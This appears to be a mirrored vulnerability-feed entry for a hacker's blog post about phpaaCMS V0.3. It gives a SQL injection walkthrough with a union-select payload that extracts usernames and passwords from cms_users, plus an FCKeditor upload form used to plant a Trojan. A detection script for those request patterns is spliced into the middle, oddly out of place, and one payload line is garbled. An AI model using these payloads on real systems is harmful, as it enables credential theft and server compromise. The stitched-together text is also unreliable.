phpaaCMS V0.3 injection vulnerability - Vulnerability warning - the black bar safety net

ID MYHACK58:62201026572
Type myhack58
Reporter Anonymous
Modified 2010-03-28T00:00:00


H4ckx7's Blog

I happened to pass by a PHP site. Since I rarely use PHP, I only took a cursory look and saw it was phpaaCMS, not a large CMS. Out of habit I appended a "'" at the end, and I did not expect it to throw an error!

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\" at line 1

// The error says there is a mistake in the SQL syntax near '\" at line 1.

Haha, now that it throws an error, there should be something to work with. I continued by guessing the field count with order by, and the result was 15 fields. I didn't know the database, though, so I took a quick look at the official site and found that the database is cms_cms_users, in which fields 3 and 11 are the username and password respectively.

The resulting statement is: & %201=2%20union%20select%201,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users

Looking further, the reader side has this too:


<,2,username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users>
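The three request patterns described above (an appended quote, order by column guessing, and a union select against cms_users) leave a recognizable trail in web server access logs. The following detection sketch is an added example, not code from the original post or from phpaaCMS; the path /page.php, the id parameter, the client addresses and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rules for the request patterns the post describes, applied to the decoded query.
RULES = [
    ("quote-probe", re.compile(r"'\s*$")),                        # appended single quote
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),  # column-count guessing
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("users-table", re.compile(r"\bfrom\s+cms_(?:cms_)?users\b", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')  # access-log request field


def classify(target):
    """Return the names of the rules matched by a request target's query string."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))       # second pass catches %2520-style input
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)      # union/**/select -> union select
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(lines):
    """Return (client_ip, matched_rules) for each log line that matches a rule."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        rules = classify(m.group(1)) if m else []
        if rules:
            hits.append((line.split()[0], rules))
    return hits


# Constructed sample log; /page.php and id are hypothetical names, not from the post.
SAMPLE_LOG = [
    '198.51.100.7 - - [28/Mar/2010:10:00:01 +0000] "GET /page.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Mar/2010:10:02:11 +0000] "GET /page.php?id=12%27 HTTP/1.1" 200 310',
    '203.0.113.9 - - [28/Mar/2010:10:02:40 +0000] "GET /page.php?id=12%20order%20by%2015 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [28/Mar/2010:10:03:05 +0000] "GET /page.php?id=12%20and%201=2%20union%20select%201,2,'
    'username,4,5,6,7,8,9,10,password,12,13,14,15%20from%20cms_users HTTP/1.1" 200 5300',
    '198.51.100.7 - - [28/Mar/2010:10:04:00 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG):
        print(ip, ",".join(rules))
```

A sequence of quote-probe, order-by-probe and union-select hits from one client within a short window is a stronger signal than any single rule, and is worth correlating with the SQL syntax error shown earlier appearing in responses.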

Exploit 2:

After getting into the admin backend, there is a PHP FCKeditor editor, version 2.4.2 or below.


<form id="frmUpload" enctype="multipart/form-data" action="<>" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

You can upload a Trojan in any file format through it. Tragic!

By H4ckx7